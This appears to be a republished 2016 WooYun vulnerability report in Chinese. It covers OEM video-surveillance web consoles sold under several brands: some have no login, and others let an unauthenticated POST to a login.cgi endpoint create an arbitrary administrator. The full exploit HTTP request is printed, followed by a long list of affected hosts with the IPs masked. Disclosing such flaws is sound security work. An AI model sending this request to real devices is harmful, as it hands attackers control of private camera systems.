神刀安全网

漏洞标题: 某OEM安防监控产品设计缺陷(可任意添加管理无需登录)

漏洞详情

披露状态:

2016-03-10: 细节已通知厂商并且等待厂商处理中
2016-03-14: 厂商已经确认,细节仅向厂商公开
2016-03-17: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2016-05-08: 细节向核心白帽子及相关领域专家公开
2016-05-18: 细节向普通白帽子公开
2016-05-28: 细节向实习白帽子公开
2016-06-12: 细节向公众公开

简要描述:

涉及多家厂商

详细说明:

涉及如下公司

大华e眼 [email protected]

漏洞标题:  某OEM安防监控产品设计缺陷(可任意添加管理无需登录)

华迈千里眼 [email protected]

漏洞标题:  某OEM安防监控产品设计缺陷(可任意添加管理无需登录)

鼎世千里眼 [email protected]

漏洞标题:  某OEM安防监控产品设计缺陷(可任意添加管理无需登录)

[email protected]合作,还些案例没LOGO(具体型号请登录案例测试)

code 区域
翼安居.天翼卫士
翼安居 翼安铺
天翼慧眼
189look视频看家

漏洞证明:

根据互联网案例测试发现部分产品未开启登录功能(可直接进入监控控制台),而部分产品开启了登录功能可利用post包直接添加任意管理员(无需登录,全局功能未授权访问导致)。

code 区域
POST /cn/base/cgi-bin/login.cgi?save HTTP/1.1
Host: 地址
Content-Length: 249
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20120101 Firefox/33.0
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: keyenable=; login_level=0
Connection: close

keyenable=1&username=admin&password=wooyun&group=0&name1=&pwd1=&group1=2&name2=&pwd2=&group2=2&name3=&pwd3=&group3=2&name4=&pwd4=&group4=2&name5=&pwd5=&group5=2&name6=&pwd6=&group6=2&name7=&pwd7=&group7=2&name8=&pwd8=&group8=2&name9=&pwd9=&group9=2

漏洞标题:  某OEM安防监控产品设计缺陷(可任意添加管理无需登录)

漏洞标题:  某OEM安防监控产品设计缺陷(可任意添加管理无需登录)

漏洞标题:  某OEM安防监控产品设计缺陷(可任意添加管理无需登录)

漏洞标题:  某OEM安防监控产品设计缺陷(可任意添加管理无需登录)

案例:

code 区域
以下案例需登录验证(可利用post包直接添加管理员):
**.**.**.**/cn/
**.**.**.**/en/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**:83/cn/
**.**.**.**:82/cn/
**.**.**.**:82/cn/
**.**.**.**/cn/
**.**.**.**:82/cn/
**.**.**.**:81/cn/
**.**.**.**:81/cn/
**.**.**.**:81/cn/
**.**.**.**/cn/
**.**.**.**:82/cn/
**.**.**.**:82/cn/
**.**.**.**:81/cn/
**.**.**.**:100/cn/
**.**.**.**:8081/cn/
**.**.**.**:81/cn/
以下案例未开启登录验证功能直接可进控制台:
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**/cn/
**.**.**.**:100/cn/ 华迈千里眼see1000
**.**.**.**:81/cn/
**.**.**.**:89/cn/
**.**.**.**:81/cn/
**.**.**.**:88/cn/
**.**.**.**:81/cn/
**.**.**.**/cn/
**.**.**.**:81/cn/
**.**.**.**/cn/
**.**.**.**:100/cn/
**.**.**.**:100/cn/
**.**.**.**:81/cn/ 大华e眼 远程视频监控系统运营服务平台
**.**.**.**/cn/ 翼安居.天翼卫士
**.**.**.**/cn/ 翼安居 翼安铺
**.**.**.**/cn/
**.**.**.**:8090/cn/
**.**.**.**:82/cn/
**.**.**.**/cn/ 鼎世千里眼
**.**.**.**:85/cn/
**.**.**.**:81/cn/ 189look视频看家
**.**.**.**/cn/
**.**.**.**:81/cn/
**.**.**.**:84/cn/
**.**.**.**/cn/ 天翼慧眼
**.**.**.**/cn/
**.**.**.**:81/cn/
**.**.**.**:8081/cn/
**.**.**.**/cn/
**.**.**.**:81/cn/
**.**.**.**/cn/
**.**.**.**:100/cn/
**.**.**.**:100/cn/
**.**.**.**:85/cn/

修复方案:

联系厂商

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 某OEM安防监控产品设计缺陷(可任意添加管理无需登录)

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址